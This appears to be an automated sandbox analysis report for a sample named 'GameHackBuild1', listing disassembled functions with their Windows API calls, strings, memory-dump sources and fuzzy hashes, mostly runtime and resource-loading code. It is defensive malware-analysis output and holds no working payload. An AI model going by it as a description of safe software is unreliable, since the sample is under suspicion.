                                        • Part of subcall function 00A284DE: GetLastError.KERNEL32(?,?,00A2BFA7,?,00000000,?,00000000,?,00A2BFCE,?,00000007,?,?,00A2C3CB,?,?), ref: 00A28506
                                      • _free.LIBCMT ref: 00A2C00E
                                      • _free.LIBCMT ref: 00A2C019
                                      • _free.LIBCMT ref: 00A2C06D
                                      • _free.LIBCMT ref: 00A2C078
                                      • _free.LIBCMT ref: 00A2C083
                                      • _free.LIBCMT ref: 00A2C08E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                                      • Instruction ID: 82f47f2e7ab3d7be7f9301ee7ba848197e4b2ad9accb45021546e7577d6cea3c
                                      • Opcode Fuzzy Hash: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                                      • Instruction Fuzzy Hash: 71117231551B24F7D620BBB4DF07FCBB79D6F04700F408874B79966452DB6AF9049AA0
                                      Function 00A220CA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32(?,?,00A220C1,00A1FB12), ref: 00A220D8
                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00A220E6
                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00A220FF
                                      • SetLastError.KERNEL32(00000000,?,00A220C1,00A1FB12), ref: 00A22151
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: ErrorLastValue___vcrt_
                                      • String ID:
                                      • API String ID: 3852720340-0
                                      • Opcode ID: 251c3423779c94ce26db82007171e097f018c4aed1f82949927f0c51127c394c
                                      • Instruction ID: 9e482880db0ec20ebb79df1fa849e7f996a0a72f868168898c0b8059f9d29bbb
                                      • Opcode Fuzzy Hash: 251c3423779c94ce26db82007171e097f018c4aed1f82949927f0c51127c394c
                                      • Instruction Fuzzy Hash: BC01F7332097717EBB68ABFD7C86B6A2B58EB127707210739FB10590E0EF558D129344
                                      Function 00A1DC9A Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMONLIBRARYCODE
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                      • API String ID: 0-1718035505
                                      • Opcode ID: b0be91df0a1479df9a1ecb22c6838cd4abfb7e7ed91fd963ab834ff3d721d36d
                                      • Instruction ID: 505f478e9cafd53f90ac73d1bce27b4d7ea79510c2430ca0399a1a4ed5c6602d
                                      • Opcode Fuzzy Hash: b0be91df0a1479df9a1ecb22c6838cd4abfb7e7ed91fd963ab834ff3d721d36d
                                      • Instruction Fuzzy Hash: 7A01C8727427226B8F249FF96D85AE723E4AA42356320593EF501D7240EAD1C8C2D6E0
                                      Function 00A10CBE Relevance: 9.1, APIs: 6, Instructions: 94timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00A10D0D
                                        • Part of subcall function 00A0ACF5: GetVersionExW.KERNEL32(?), ref: 00A0AD1A
                                      • LocalFileTimeToFileTime.KERNEL32(?,00A10CB8), ref: 00A10D31
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00A10D47
                                      • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00A10D56
                                      • SystemTimeToFileTime.KERNEL32(?,00A10CB8), ref: 00A10D64
                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00A10D72
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: Time$File$System$Local$SpecificVersion
                                      • String ID:
                                      • API String ID: 2092733347-0
                                      • Opcode ID: 88a2df393b8ec899d65a92e795d0281cb76d4b80515eac4b5d0e3bab5cb7c1ca
                                      • Instruction ID: c87ed3c798f7a9d9a49a6e7d7acb081447c0483e5a80c9231bf308b3a80081ad
                                      • Opcode Fuzzy Hash: 88a2df393b8ec899d65a92e795d0281cb76d4b80515eac4b5d0e3bab5cb7c1ca
                                      • Instruction Fuzzy Hash: DE31D27A90020AEBCF04DFE5D8859EFFBB8FF58700B04455AE955E3210E730AA85CB64
                                      Function 00A191B0 Relevance: 9.1, APIs: 6, Instructions: 89COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: _memcmp
                                      • String ID:
                                      • API String ID: 2931989736-0
                                      • Opcode ID: a5da34403a6834cd83e9e0e897c434d4e54dc27ee53f5a788544b92b42cdad3a
                                      • Instruction ID: dfd9406e1adaf403947c858250ffd67b9be63665508612cdb80864370ed18d43
                                      • Opcode Fuzzy Hash: a5da34403a6834cd83e9e0e897c434d4e54dc27ee53f5a788544b92b42cdad3a
                                      • Instruction Fuzzy Hash: 68216071A0420EBBEB059F24DD91FFB77ADAB54788F148528FC099B201E270EDC6D691
                                      Function 00A28FA5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32(?,00A40F50,00A23E14,00A40F50,?,?,00A2388F,?,?,00A40F50), ref: 00A28FA9
                                      • _free.LIBCMT ref: 00A28FDC
                                      • _free.LIBCMT ref: 00A29004
                                      • SetLastError.KERNEL32(00000000,?,00A40F50), ref: 00A29011
                                      • SetLastError.KERNEL32(00000000,?,00A40F50), ref: 00A2901D
                                      • _abort.LIBCMT ref: 00A29023
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: ErrorLast$_free$_abort
                                      • String ID:
                                      • API String ID: 3160817290-0
                                      • Opcode ID: afd198db45c5422fbc1a2a7ec460be585666380f09a89f6d1ed48f7c9901a2b6
                                      • Instruction ID: f1aec538fe24f2f71f3ca325bbeff44411fe3fe21c39bfafacdf07b842efc77a
                                      • Opcode Fuzzy Hash: afd198db45c5422fbc1a2a7ec460be585666380f09a89f6d1ed48f7c9901a2b6
                                      • Instruction Fuzzy Hash: 37F0C83650A6316BC615B37C7E0AF2B2A6A9BD1761F250134F515E2296EF28CD026115
                                      Function 00A1D2E6 Relevance: 9.0, APIs: 6, Instructions: 43windowsynchronizationCOMMON
                                      Download Yara Rule
                                      APIs
                                      • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00A1D2F2
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00A1D30C
                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A1D31D
                                      • TranslateMessage.USER32(?), ref: 00A1D327
                                      • DispatchMessageW.USER32(?), ref: 00A1D331
                                      • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00A1D33C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                      • String ID:
                                      • API String ID: 2148572870-0
                                      • Opcode ID: 9786fd8e297534231c776d34ede9e08d48ba51c782ef6ebb344ee05d2903f180
                                      • Instruction ID: b3374847ca0ab38d087a243fa344599c7eebd792b4d1974a27a08c1eb707c149
                                      • Opcode Fuzzy Hash: 9786fd8e297534231c776d34ede9e08d48ba51c782ef6ebb344ee05d2903f180
                                      • Instruction Fuzzy Hash: 3BF03C72A01519BBCF219BE1EC4CEDBBF7DEF52391F008012F606D6050D6758982C7A1
                                      Function 00A1C40E Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                      Download Yara Rule
                                      APIs
                                      • _wcschr.LIBVCRUNTIME ref: 00A1C435
                                        • Part of subcall function 00A117AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00A0BB05,00000000,.exe,?,?,00000800,?,?,00A185DF,?), ref: 00A117C2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: CompareString_wcschr
                                      • String ID: <$HIDE$MAX$MIN
                                      • API String ID: 2548945186-3358265660
                                      • Opcode ID: 86ab50af6db0b89d4a3eef2aeeb456abba8e24eb9003cfbf0f79c0520ecdfa12
                                      • Instruction ID: 7b5bad4f2b608d3f57fb3535759326bc1b5ebdc757ec78cd82328447a9f888b2
                                      • Opcode Fuzzy Hash: 86ab50af6db0b89d4a3eef2aeeb456abba8e24eb9003cfbf0f79c0520ecdfa12
                                      • Instruction Fuzzy Hash: 02319272944209AADF21DBA4DC45EEF77BDEF14360F0040A6FA05D6090EBB09FC4CA50
                                      Function 00A1ADED Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadBitmapW.USER32(00000065), ref: 00A1ADFD
                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 00A1AE22
                                      • DeleteObject.GDI32(00000000), ref: 00A1AE54
                                      • DeleteObject.GDI32(00000000), ref: 00A1AE77
                                        • Part of subcall function 00A19E1C: FindResourceW.KERNEL32(00A1AE4D,PNG,?,?,?,00A1AE4D,00000066), ref: 00A19E2E
                                        • Part of subcall function 00A19E1C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,00A1AE4D,00000066), ref: 00A19E46
                                        • Part of subcall function 00A19E1C: LoadResource.KERNEL32(00000000,?,?,?,00A1AE4D,00000066), ref: 00A19E59
                                        • Part of subcall function 00A19E1C: LockResource.KERNEL32(00000000,?,?,?,00A1AE4D,00000066), ref: 00A19E64
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
                                      • String ID: ]
                                      • API String ID: 142272564-3352871620
                                      • Opcode ID: 9076b38d19a9e765c2acf133c8517e7221094217c84212ddd1f91d97ff1fbf0e
                                      • Instruction ID: 00836f947945a69276db2cbb95217949fa6e578dccc3fdbbea0841e8518f7e22
                                      • Opcode Fuzzy Hash: 9076b38d19a9e765c2acf133c8517e7221094217c84212ddd1f91d97ff1fbf0e
                                      • Instruction Fuzzy Hash: B0016236941621A7D710A7A4AC15BFF7B7AAF81B02F080020FD00A72D1CB728C66C2B2
                                      Function 00A1CC90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00A0130B: GetDlgItem.USER32(00000000,00003021), ref: 00A0134F
                                        • Part of subcall function 00A0130B: SetWindowTextW.USER32(00000000,00A335B4), ref: 00A01365
                                      • EndDialog.USER32(?,00000001), ref: 00A1CCDB
                                      • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00A1CCF1
                                      • SetDlgItemTextW.USER32(?,00000066,?), ref: 00A1CD05
                                      • SetDlgItemTextW.USER32(?,00000068), ref: 00A1CD14
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: ItemText$DialogWindow
                                      • String ID: RENAMEDLG
                                      • API String ID: 445417207-3299779563
                                      • Opcode ID: 836b21c7420733275bf0410640b3f29062ecaa7dc28681464b4a652849d4c847
                                      • Instruction ID: 7e13ab8d23934d609d427bad727152682367eef80d5c2f85f3556ff798479f7e
                                      • Opcode Fuzzy Hash: 836b21c7420733275bf0410640b3f29062ecaa7dc28681464b4a652849d4c847
                                      • Instruction Fuzzy Hash: 7A01B5322C47107ED511CBA4AD09FE77BACAB5A752F140411F345A60E0C6A29D5687A6
                                      Function 00A275C2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00A27573,?,?,00A27513,?,00A3BAD8,0000000C,00A2766A,?,00000002), ref: 00A275E2
                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00A275F5
                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00A27573,?,?,00A27513,?,00A3BAD8,0000000C,00A2766A,?,00000002,00000000), ref: 00A27618
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AddressFreeHandleLibraryModuleProc
                                      • String ID: CorExitProcess$mscoree.dll
                                      • API String ID: 4061214504-1276376045
                                      • Opcode ID: 7b8d44b894579eae8d762c9d6c443bf7f90f5b4a0f5ab3e6bc181abd2f67ab37
                                      • Instruction ID: c99bd9697fba82b6cc0c5313d34a3e6ea463966a45f877e28d8255639400e74e
                                      • Opcode Fuzzy Hash: 7b8d44b894579eae8d762c9d6c443bf7f90f5b4a0f5ab3e6bc181abd2f67ab37
                                      • Instruction Fuzzy Hash: 80F04F31A18618BBDF15DBE8DC09BEEBFB9EF04711F004169F805A6150DB708A81CA94
                                      Function 00A0EB73 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00A10085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00A100A0
                                        • Part of subcall function 00A10085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00A0EB86,Crypt32.dll,00000000,00A0EC0A,?,?,00A0EBEC,?,?,?), ref: 00A100C2
                                      • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00A0EB92
                                      • GetProcAddress.KERNEL32(00A481C0,CryptUnprotectMemory), ref: 00A0EBA2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AddressProc$DirectoryLibraryLoadSystem
                                      • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                      • API String ID: 2141747552-1753850145
                                      • Opcode ID: c1880c754447c46fd6ff5d7197608cbda139cc6a87e851873855d2260be3c5f8
                                      • Instruction ID: 9fee640c33cdce12159a617c24ec82f12264ffc56917aa17cc1fddfec3ceaab5
                                      • Opcode Fuzzy Hash: c1880c754447c46fd6ff5d7197608cbda139cc6a87e851873855d2260be3c5f8
                                      • Instruction Fuzzy Hash: 08E04672908751EECF20DF78AC18B42BAE46B1A701F04CC5EF4D6E3A80DAF5D5808B60
                                      Function 00A27DD9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: _free
                                      • String ID:
                                      • API String ID: 269201875-0
                                      • Opcode ID: 8021f4f466445d57524970784afbd3e299d00299deb5facfc855b5ccde938890
                                      • Instruction ID: f236d9abddeca2466237514d67dc75834fb1b99bee7acbf58cd3e2cd46b55421
                                      • Opcode Fuzzy Hash: 8021f4f466445d57524970784afbd3e299d00299deb5facfc855b5ccde938890
                                      • Instruction Fuzzy Hash: 3341C332A003149FCB10DF7CD981A5EB7B6EF85714B1645A8E915EB281DB31EE01CB80
                                      Function 00A2B610 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetEnvironmentStringsW.KERNEL32 ref: 00A2B619
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A2B63C
                                        • Part of subcall function 00A28518: RtlAllocateHeap.NTDLL(00000000,?,?,?,00A23A26,?,0000015D,?,?,?,?,00A24F02,000000FF,00000000,?,?), ref: 00A2854A
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00A2B662
                                      • _free.LIBCMT ref: 00A2B675
                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00A2B684
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                      • String ID:
                                      • API String ID: 336800556-0
                                      • Opcode ID: b650351f7bef9b2a5f625702f8dc46dff2b2e4f2ef9f2a18ce1d7e3d4a8d7df9
                                      • Instruction ID: ca254aaff9d006d137678aba46e152a5cc4a34ebdb00b435484a21668cc2c7b6
                                      • Opcode Fuzzy Hash: b650351f7bef9b2a5f625702f8dc46dff2b2e4f2ef9f2a18ce1d7e3d4a8d7df9
                                      • Instruction Fuzzy Hash: 3F01B172A12221BF272157BE7C88C7B6B6EDAC6BA13140238B904C2110DF75CD02A1B0
                                      Function 00A29029 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32(?,?,?,00A2895F,00A285FB,?,00A28FD3,00000001,00000364,?,00A2388F,?,?,00A40F50), ref: 00A2902E
                                      • _free.LIBCMT ref: 00A29063
                                      • _free.LIBCMT ref: 00A2908A
                                      • SetLastError.KERNEL32(00000000,?,00A40F50), ref: 00A29097
                                      • SetLastError.KERNEL32(00000000,?,00A40F50), ref: 00A290A0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
